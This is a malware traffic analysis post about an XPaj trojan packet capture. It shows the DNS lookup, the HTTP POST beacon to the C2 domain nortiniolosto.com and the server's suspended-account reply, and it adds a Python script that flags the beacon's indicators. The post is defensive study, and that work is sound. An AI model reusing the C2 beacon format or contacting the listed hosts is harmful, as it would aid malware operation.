XPaj Malware Trojan Packet Analysis: Download PCAP Sample

January 29, 2016


Download XPAJ PCAP Sample: xpaj.pcap

Below is the tcpdump output of the capture, with the ASCII rendering of each packet's payload (non-printable bytes are shown as dots). The sequence is: a DNS lookup of the C2 domain nortiniolosto.com, a connection to msn.com that is opened and closed without sending data, the HTTP POST beacon to the C2, and the server's reply.


2012-05-02 16:18:32.092414 IP 192.168.254.194.49734 > 8.8.8.8.53: 34837+ A? nortiniolosto.com. (35)
E..?R……r………F.5.+……………nortiniolosto.com…..
2012-05-02 16:18:32.235179 IP 8.8.8.8.53 > 192.168.254.194.49734: 34837 1/0/0 A 208.91.198.30 (51)
E..OG;..8.k……….5.F.;.)………….nortiniolosto.com………………[..
2012-05-02 16:18:32.240585 IP 192.168.254.194.64504 > 8.8.8.8.53: 55906+ A? msn.com. (25)
E..5R……{………..5.!l..b………..msn.com…..
2012-05-02 16:18:32.256362 IP 8.8.8.8.53 > 192.168.254.194.64504: 55906 1/0/0 A 65.55.206.203 (41)
E..E.T..8…………5…1…b………..msn.com…………..F..A7..
2012-05-02 16:18:32.260152 IP 192.168.254.194.63549 > 65.55.206.203.80: Flags [S], seq 490089477, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4R.@………A7…=.P.6,……. .=……………
2012-05-02 16:18:32.344033 IP 65.55.206.203.80 > 192.168.254.194.63549: Flags [S.], seq 4152198374, ack 490089478, win 8190, options [mss 1460], length 0
E..,.-@…+0A7…….P.=.}…6,.`….{……..
2012-05-02 16:18:32.344200 IP 192.168.254.194.63549 > 65.55.206.203.80: Flags [.], ack 1, win 64240, length 0
E..(R.@………A7…=.P.6,..}..P…’F..
2012-05-02 16:18:32.348033 IP 192.168.254.194.63550 > 208.91.198.30.80: Flags [S], seq 1106937627, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4R.@…R……[…>.PA……… .7……………
2012-05-02 16:18:32.348376 IP 192.168.254.194.63549 > 65.55.206.203.80: Flags [F.], seq 1, ack 1, win 64240, length 0
E..(R.@………A7…=.P.6,..}..P…’E..
2012-05-02 16:18:32.402364 IP 208.91.198.30.80 > 192.168.254.194.63550: Flags [S.], seq 3344325677, ack 1106937628, win 5840, options [mss 1436,nop,nop,sackOK,nop,wscale 7], length 0
E..4..@.9….[…….P.>.V\-A……..:…………..
2012-05-02 16:18:32.402500 IP 192.168.254.194.63550 > 208.91.198.30.80: Flags [.], ack 1, win 258, length 0
E..(R.@…R#…..[…>.PA….V\.P…s…
2012-05-02 16:18:32.409570 IP 192.168.254.194.63550 > 208.91.198.30.80: Flags [.], seq 1:1437, ack 1, win 258, length 1436: HTTP: POST /DxODlv?LefXWtQIRXkgARPGI=uTUkyVoqbqCvLHFM&ocwPqoQoSasSTJgMh=VutdsgvYkpKpKh HTTP/1.1
E…R.@…L……[…>.PA….V\.P…….POST /DxODlv?LefXWtQIRXkgARPGI=uTUkyVoqbqCvLHFM&ocwPqoQoSasSTJgMh=VutdsgvYkpKpKh HTTP/1.1
Host: nortiniolosto.com
Content-Length: 1279
Accept-Encoding: deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Pragma: no-cache
Cache-Control: no-cache
Connection: close

filename=rteacs.brz&data=……….B+…3.~Fo.G………).’ZuY….U.6e]r`Ye.m. .’G…..RU….O…….R…T.)…….>]……_.h…C..7.J……_l)j&..(…#.A.OB.|..W.
…K.”)…&P].M7..%….W?/..~..;..?z…Q..dg….$…I..C….c/…..5M?.i…….vX.f..sM,.h}’..R
.04.h.p..Y@u.f..p.Wf;….g.$)eO….7..{5…b.(.)..”0Y….raX..t…[…r..
<.8.=…]-….G….y…F<.l)T….01s….o&d……….U….|.i.*ga…….&[n0%……………/..Hj.^.8..3_……7~\QW”x..@.u.s.w…M.*…_1′.y….
A.O….K}…..&.. .1BOU…T.n…M.>W…G4….a.A..F.5……….7#.{CH7..-z.].t…..W6….k$6C…..Q47..)..J.^.F.2..0..j…].G.d….AH…I…………5.r..W.a…(……….fL1kQ…….P.@lF)q.E=.v..V….D. .1j..f..c.?i&……b%……./ji………,……z…..Ck….3..L.n….d..a.$u.PP..;..2G..q.,–.L.+w.-_. cE.”..C…”.Hb`.

2012-05-02 16:18:32.449317 IP 208.91.198.30.80 > 192.168.254.194.63550: Flags [P.], seq 1:842, ack 1722, win 91, length 841: HTTP: HTTP/1.1 302 Found
E..q..@.9.V..[…….P.>.V\.A…P..[.0..HTTP/1.1 302 Found
Date: Wed, 02 May 2012 21:18:31 GMT
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_fcgid/2.3.6
Location: http://nortiniolosto.com/cgi-sys/suspendedpage.cgi?LefXWtQIRXkgARPGI=uTUkyVoqbqCvLHFM&ocwPqoQoSasSTJgMh=VutdsgvYkpKpKh
Content-Length: 462
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://nortiniolosto.com/cgi-sys/suspendedpage.cgi?LefXWtQIRXkgARPGI=uTUkyVoqbqCvLHFM&amp;ocwPqoQoSasSTJgMh=VutdsgvYkpKpKh">here</a>.</p>
<hr>
<address>Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_fcgid/2.3.6 Server at nortiniolosto.com Port 80</address>
</body></html>

2012-05-02 16:18:32.449349 IP 208.91.198.30.80 > 192.168.254.194.63550: Flags [F.], seq 842, ack 1722, win 91, length 0
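What the capture shows, read top to bottom: the host resolves nortiniolosto.com through 8.8.8.8 (208.91.198.30), opens a TCP connection to msn.com and tears it down again without sending a byte (consistent with a connectivity check before beaconing), then POSTs to the C2 at a random-looking path with random-looking query parameter names and values. The body is `filename=rteacs.brz&data=` followed by 1254 bytes of binary, and the only unusual request header is a deflate-only Accept-Encoding. The C2 answers with a 302 to `/cgi-sys/suspendedpage.cgi`, which is the page cPanel serves for a suspended hosting account: by the time this capture was taken the account behind the C2 domain had already been suspended, so the sample got no tasking back.

The script below is an added triage example, not code from the original post. It does not read xpaj.pcap; the request line, request headers and response headers are reproduced from the dump above, while the binary POST body is a constructed placeholder of the right length (the real bytes are not recoverable from the ASCII rendering). The case-flip heuristic for spotting random tokens and the "deflate-only" indicator are my own assumptions, as noted in the comments.

```python
import math
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Request line and headers copied verbatim from the capture above. The real POST
# body is binary and not recoverable from the ASCII dump, so it is replaced by a
# CONSTRUCTED placeholder of the same length (1279 bytes, matching Content-Length).
XPAJ_REQUEST = (
    b"POST /DxODlv?LefXWtQIRXkgARPGI=uTUkyVoqbqCvLHFM&ocwPqoQoSasSTJgMh=VutdsgvYkpKpKh HTTP/1.1\r\n"
    b"Host: nortiniolosto.com\r\n"
    b"Content-Length: 1279\r\n"
    b"Accept-Encoding: deflate\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; "
    b".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\r\n"
    b"Pragma: no-cache\r\n"
    b"Cache-Control: no-cache\r\n"
    b"Connection: close\r\n"
    b"\r\n"
    b"filename=rteacs.brz&data=" + bytes((i * 73 + 5) % 256 for i in range(1254))
)

# Response status line and headers verbatim from the capture; HTML body omitted.
XPAJ_RESPONSE = (
    b"HTTP/1.1 302 Found\r\n"
    b"Date: Wed, 02 May 2012 21:18:31 GMT\r\n"
    b"Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_fcgid/2.3.6\r\n"
    b"Location: http://nortiniolosto.com/cgi-sys/suspendedpage.cgi?LefXWtQIRXkgARPGI=uTUkyVoqbqCvLHFM&ocwPqoQoSasSTJgMh=VutdsgvYkpKpKh\r\n"
    b"Content-Length: 462\r\n"
    b"Connection: close\r\n"
    b"Content-Type: text/html; charset=iso-8859-1\r\n"
    b"\r\n"
)

# Bytes a genuine application/x-www-form-urlencoded body may contain.
FORM_ALPHABET = re.compile(rb"[A-Za-z0-9*\-._%+]*")


def parse_http_message(raw: bytes):
    """Split a raw HTTP/1.x message into (start_line, headers, body).
    Header names are lower-cased so lookups are case-insensitive."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; encrypted or compressed data sits close to 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def looks_random(token: str, min_flips: int = 3, min_ratio: float = 0.35) -> bool:
    """Heuristic (my assumption, not from the post): the XPaj path and parameter
    names are purely alphabetic with frequent upper/lower-case flips, unlike
    ordinary web identifiers such as 'sessionid' or 'userId'."""
    if len(token) < 2 or not token.isalpha():
        return False
    flips = sum(a.isupper() != b.isupper() for a, b in zip(token, token[1:]))
    return flips >= min_flips and flips / (len(token) - 1) >= min_ratio


def xpaj_indicators(raw_request: bytes) -> dict:
    """Return the features that make the beacon above stand out from browser
    traffic. A key is present only when the corresponding check fires."""
    start, headers, body = parse_http_message(raw_request)
    method, target, _ = start.split(" ", 2)
    url = urlsplit(target)
    found = {}
    # 1. Random-looking path segment and query parameter names/values.
    tokens = [url.path.lstrip("/")]
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        tokens += [name, value]
    random_tokens = [t for t in tokens if looks_random(t)]
    if random_tokens:
        found["random_tokens"] = random_tokens
    # 2. Form-encoded "upload" whose data field is raw binary, not form-encoded.
    if method == "POST" and headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        m = re.match(rb"filename=([^&]+)&data=", body)
        if m:
            blob = body[m.end():]
            found["upload_filename"] = m.group(1).decode("ascii", "replace")
            found["data_entropy"] = round(shannon_entropy(blob), 2)
            found["raw_binary_in_form_body"] = FORM_ALPHABET.fullmatch(blob) is None
    # 3. Weak header oddity (assumption): browsers advertise "gzip, deflate".
    if headers.get("accept-encoding", "").lower() == "deflate":
        found["deflate_only_accept_encoding"] = True
    # 4. Sanity check that the TCP stream was reassembled completely.
    found["content_length_matches"] = int(headers.get("content-length", -1)) == len(body)
    return found


def classify_c2_response(raw_response: bytes) -> str:
    """Name what the C2 host answered. /cgi-sys/suspendedpage.cgi is the page
    cPanel serves for a suspended hosting account."""
    start, headers, _ = parse_http_message(raw_response)
    status = start.split(" ", 2)[1]
    location_path = urlsplit(headers.get("location", "")).path
    if status in ("301", "302") and location_path.endswith("/cgi-sys/suspendedpage.cgi"):
        return "c2-account-suspended"
    return "other:" + status


if __name__ == "__main__":
    for key, value in xpaj_indicators(XPAJ_REQUEST).items():
        print(f"{key}: {value}")
    print("response:", classify_c2_response(XPAJ_RESPONSE))
```

To run the same checks against the real xpaj.pcap, feed `xpaj_indicators` the reassembled client-to-server bytes of the 192.168.254.194:63550 to 208.91.198.30:80 stream (for example, a Wireshark "Follow TCP Stream" export) instead of the constructed `XPAJ_REQUEST`; the `content_length_matches` key will tell you whether the reassembly was complete.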
